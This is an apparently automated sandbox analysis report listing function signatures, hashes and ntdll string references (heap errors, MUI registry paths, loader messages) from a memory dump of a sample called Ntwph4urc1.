                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                              • API String ID: 0-3532704233
                                              • Opcode ID: 3f41de71dea9837ce44ee58623f7ff92f30189ab099c2ae0952a2b0152b1dfed
                                              • Instruction ID: e965e5ea77e3be5c5f3a1348b525f6749137cfb542d1f242c93ee7a3a096bae0
                                              • Opcode Fuzzy Hash: 3f41de71dea9837ce44ee58623f7ff92f30189ab099c2ae0952a2b0152b1dfed
                                              • Instruction Fuzzy Hash: 4BB1ABB69093559FE711CF25C890A5BB7E8FB88758F61492EF888D7240DB70DD08CB92
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3570731704
                                              • Opcode ID: 98b00e5ce63afe08de6f422dba338e68a0dcc60f9c9adc3176aff3ae90d09bd0
                                              • Instruction ID: b50ea0375d429f05f3030524721781c1b5c526e6dde3ae293f25cf8219e61af2
                                              • Opcode Fuzzy Hash: 98b00e5ce63afe08de6f422dba338e68a0dcc60f9c9adc3176aff3ae90d09bd0
                                              • Instruction Fuzzy Hash: 84924875E10328CFEB24CF19CC40B99BBB5AF45354F2681EADA49AB251D7309E80CF52
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3696D959
                                                • Part of subcall function 36944859: RtlDebugPrintTimes.NTDLL ref: 369448F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1975516107
                                              • Opcode ID: 425afa8c541222edbfc734fa47acb055d196de7002e7992ecce9e6df9db57bfb
                                              • Instruction ID: f0b178ed170e77f67342b90658edbc659f77fc8a427d89cfafb986611f8b105e
                                              • Opcode Fuzzy Hash: 425afa8c541222edbfc734fa47acb055d196de7002e7992ecce9e6df9db57bfb
                                              • Instruction Fuzzy Hash: 9451DF75E043459FEB11CFAAC88478DBBB2BF483A8F344159C9107B291D774A88ACBD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              • Opcode ID: 1929c77bbfe0065d9eed3b3709dd72fe8dc9c3d6096d5d297dbf328b1c5131cc
                                              • Instruction ID: ba3935418a573525e8e0d37a9b9d203055197240c25c2c39136be4a5809fd454
                                              • Opcode Fuzzy Hash: 1929c77bbfe0065d9eed3b3709dd72fe8dc9c3d6096d5d297dbf328b1c5131cc
                                              • Instruction Fuzzy Hash: 1CD190B2809315AFD721EA54C840BAFB7ECEF84754F818939FA84AB151D774C948C7D2
                                              Strings
                                              • @, xrefs: 3693D313
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3693D196
                                              • @, xrefs: 3693D2AF
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3693D2C3
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3693D0CF
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3693D262
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3693D146
                                              • @, xrefs: 3693D0FD
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1356375266
                                              • Opcode ID: 57c9289760fa3b815e146588d98894c11bc39539a187cfb61824ccb301f79ae6
                                              • Instruction ID: a1b8ad31f5e222ab70a86046526e82d27e11c216cc570b5d9fb585eba81ac7b8
                                              • Opcode Fuzzy Hash: 57c9289760fa3b815e146588d98894c11bc39539a187cfb61824ccb301f79ae6
                                              • Instruction Fuzzy Hash: AAA15AB19093459FE321CF61C890B9BB7E8FB84759F60492EE58896241E774D90CCF93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              • Opcode ID: a498522ed39a7f1179596808d9cf1aaa505f38d7b4c5c21ebda523f5c89143a0
                                              • Instruction ID: 5857cde7d526f97952e1ab2d09beb2ff23c99d38fe77d9def479bd6d6113c4e7
                                              • Opcode Fuzzy Hash: a498522ed39a7f1179596808d9cf1aaa505f38d7b4c5c21ebda523f5c89143a0
                                              • Instruction Fuzzy Hash: DF422F75609781DFE310CF29C984A6ABBE9FF88348F24496DE485CB352DB34D846CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              • Opcode ID: c55481f85604e2aff6554f4345c6f4280dd01f3a08e880ab467dfbdda7048b22
                                              • Instruction ID: 2fd44adff26e7199d9fedee45de16d92bc08bbb7682af4ecb4c59c81459c09dc
                                              • Opcode Fuzzy Hash: c55481f85604e2aff6554f4345c6f4280dd01f3a08e880ab467dfbdda7048b22
                                              • Instruction Fuzzy Hash: 6FC14A71E00319ABEB24CF65CCA0B7E77B9AF45354F2640A9EA01AF285DB74CD45C392
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              • Opcode ID: 763370a930db2826c579ec38a44852bd83a3fbc7c6feb54f7af3e5b22112489b
                                              • Instruction ID: b1f9685fa62c10ccefeafd57f8cc03426e4cc6710d257ef20eb6431ae7156067
                                              • Opcode Fuzzy Hash: 763370a930db2826c579ec38a44852bd83a3fbc7c6feb54f7af3e5b22112489b
                                              • Instruction Fuzzy Hash: 35F19874B00705DFEB15CF68C894B6AB7F9FB44348F2281A8EA059B381D734E981CB91
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 369B02E7
                                              • RTL: Re-Waiting, xrefs: 369B031E
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 369B02BD
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: 766ffa16181af5a6032f1b697453321d79d6fb98c71e4cfcb37e39ed255141dc
                                              • Instruction ID: daac4949a8f06697696adb613aa6cb3f25bb6a4d1886db7024cc9ec152d9679f
                                              • Opcode Fuzzy Hash: 766ffa16181af5a6032f1b697453321d79d6fb98c71e4cfcb37e39ed255141dc
                                              • Instruction Fuzzy Hash: CDE1E274A087419FE721CF29C884B0AB7E5FF84368F200A5DF5A58B2E1DB74D945CB82
                                              Strings
                                              • Kernel-MUI-Number-Allowed, xrefs: 36965247
                                              • Kernel-MUI-Language-Allowed, xrefs: 3696527B
                                              • Kernel-MUI-Language-Disallowed, xrefs: 36965352
                                              • WindowsExcludedProcs, xrefs: 3696522A
                                              • Kernel-MUI-Language-SKU, xrefs: 3696542B
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 9651fe5512c3127a93ab441208743a87da4e4f18c97768fa53001a93a8f9a5a1
                                              • Instruction ID: fce70663e86c04d5d5524f0222f3b40db5c2ae784ef339ebb20e915fc55d6510
                                              • Opcode Fuzzy Hash: 9651fe5512c3127a93ab441208743a87da4e4f18c97768fa53001a93a8f9a5a1
                                              • Instruction Fuzzy Hash: 55F12AB6D10329EFDB11CF99C980E9EBBFDAF48654F61405AE501A7211EB749E01CBA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 5f7eab0ad4e4182f9045009debe364766122c645db4c718930b236118b49219f
                                              • Instruction ID: a26d46487cfc733878f8a3f415ad75631b8f245ce7a8ccb53ad31ce81a7cdcd5
                                              • Opcode Fuzzy Hash: 5f7eab0ad4e4182f9045009debe364766122c645db4c718930b236118b49219f
                                              • Instruction Fuzzy Hash: 30F11876E006158FDB08CF69C99067EFBF6AF98210B6A416DD856EF380E634E901CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                              • API String ID: 0-3061284088
                                              • Opcode ID: 6bc1624458c0a75bdf542a1c9ec13a350ea15048fe80cc8c4a2e80254a5570a4
                                              • Instruction ID: 911148a1bb2a474ad68b00a031beeaa7dba5d87421d78249c8dfe1a77e4a2813
                                              • Opcode Fuzzy Hash: 6bc1624458c0a75bdf542a1c9ec13a350ea15048fe80cc8c4a2e80254a5570a4
                                              • Instruction Fuzzy Hash: F8014737006294DEE325CB19DD0AF937BF8DB92774F36408AE1004B65ACAACDC81CA61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 641768db542759a95f0cfe659a24aa6219b4b80b784abb5a5c6c0f0bea8d887c
                                              • Instruction ID: 935acb42fa2c4446e8d8beb85d8a23b94fd1d85e4e8596fddb8efa030ea7e2d4
                                              • Opcode Fuzzy Hash: 641768db542759a95f0cfe659a24aa6219b4b80b784abb5a5c6c0f0bea8d887c
                                              • Instruction Fuzzy Hash: D213BE74E00329CFEB14CF69C9847A9BBF5BF48304F2581A9DA45AB381D734A946CF91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$.mui$.mun$SystemResources\
                                              • API String ID: 0-3047833772
                                              • Opcode ID: b2d7d5d57c7b2ed5e391169ca6d853a110d12ca35d40a79c28df514e9f2fecb9
                                              • Instruction ID: a7382a4a8850635ed4b2e12681a2d8db44e405ecf7fed1f5cfcb2a3a134a62a0
                                              • Opcode Fuzzy Hash: b2d7d5d57c7b2ed5e391169ca6d853a110d12ca35d40a79c28df514e9f2fecb9
                                              • Instruction Fuzzy Hash: 73623A76A00329DFDB21DF55CC40BD9B7B8BB0A354F5041EAE809A7A50DB319E85CF92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              • Opcode ID: e162695ccae83f7cc9cfa4c945a1b0b22a007d08bec1d17b49ead3ab6fa3a49b
                                              • Instruction ID: a49061c057c89a65e8258a54cb93bc7514c3e531b65dc56ca5678733ba5629cd
                                              • Opcode Fuzzy Hash: e162695ccae83f7cc9cfa4c945a1b0b22a007d08bec1d17b49ead3ab6fa3a49b
                                              • Instruction Fuzzy Hash: 62614372205784AFE311CB25CD44F9777E8EF84758F250869FA548B292DB34DC00CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 0-336120773
                                              • Opcode ID: 20f6d6fd01998410e3aaf5880e38b5549bf02b24a4871a26e8efdc7d028ecac2
                                              • Instruction ID: c0f302d4c16df18aa747250c5c81694ef5ad197a370bb8207905d6b685efb44a
                                              • Opcode Fuzzy Hash: 20f6d6fd01998410e3aaf5880e38b5549bf02b24a4871a26e8efdc7d028ecac2
                                              • Instruction Fuzzy Hash: BB31E076621214EFE710CB99CC81F967BE8EF0A669F320095E510DF251D632EC42CBA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              • Opcode ID: 4147264f12bc6606cdbfc37c3df11dbf66b4aed8982dedb8248197ea288ff183
                                              • Instruction ID: f357f8c99767fea6cd2ff8cb630791c48cd4d5b0a7fdf7580bf396e60304988e
                                              • Opcode Fuzzy Hash: 4147264f12bc6606cdbfc37c3df11dbf66b4aed8982dedb8248197ea288ff183
                                              • Instruction Fuzzy Hash: 7E319C76A02218AFE701CB86CC84F9BB7FCEF45774F254095E914AB295EA34ED40CA61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 745ea6bf0022c5d22308c2ecfbee2340f4590e20e9d35eaad242459b0fd1a361
                                              • Instruction ID: 92e6bcfbfed3aee170a97c90402031bd88e01dfafa298b2ebfb18bfc77427ed1
                                              • Opcode Fuzzy Hash: 745ea6bf0022c5d22308c2ecfbee2340f4590e20e9d35eaad242459b0fd1a361
                                              • Instruction Fuzzy Hash: C951E034E00719AFFB06DB64CD58B5DBBF8BF08355F204029E502AB290EB749901CB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: b406f46786c8c9fcb5f70d3be0da0139b424299b5489471fac41073e809425c4
                                              • Instruction ID: 5708cd84740e26517fc9f487db95dd750d9e529dda3fb5259a44ed61d1bd726b
                                              • Opcode Fuzzy Hash: b406f46786c8c9fcb5f70d3be0da0139b424299b5489471fac41073e809425c4
                                              • Instruction Fuzzy Hash: AC517B75A0071AAFDB06CF65CD80B9ABBB6FF49350F144065E9169B790DB30ED11CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: a5b18ee6c78e389d3c3cb0ffebccff20cdf620a9d04d2f527983fa60eb82b805
                                              • Instruction ID: 1d85f778da3013478945b0e32ea3865da4ce8a389b84564a2e33e7e82d8661a2
                                              • Opcode Fuzzy Hash: a5b18ee6c78e389d3c3cb0ffebccff20cdf620a9d04d2f527983fa60eb82b805
                                              • Instruction Fuzzy Hash: 3922F1B4A00355AFEB11CF25C890B7ABBF9EF05708F358499E5558B382D735E882CB91
                                              Strings
                                              • HEAP: , xrefs: 36941596
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36941728
                                              • HEAP[%wZ]: , xrefs: 36941712
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 59180af47e197d27b747b74cb4dadcb1e36b0d0d41d8400cdce7b56f21bf2b7a
                                              • Instruction ID: c6d0fbcc8488d8167d366a1e57087b54d63cd7c5dbe488d723ddff3a51f09023
                                              • Opcode Fuzzy Hash: 59180af47e197d27b747b74cb4dadcb1e36b0d0d41d8400cdce7b56f21bf2b7a
                                              • Instruction Fuzzy Hash: B5E10174A043559FE716CF2AC851BBABBF5AF48348F24885DE596CB246DB34E840CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                              • API String ID: 0-1145731471
                                              • Opcode ID: ec1033037980dcd6f46c3dc19b22614e346f1362492440d350f30154622ee40c
                                              • Instruction ID: 370de541fa80d9852f035b3c91896cf28427d6016785392d748f19da5c8ab626
                                              • Opcode Fuzzy Hash: ec1033037980dcd6f46c3dc19b22614e346f1362492440d350f30154622ee40c
                                              • Instruction Fuzzy Hash: 77B1BD75E147158FEB26DF6AC880B9DB7F5AF48394F254529E811EB788D730E840CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                              • API String ID: 0-2391371766
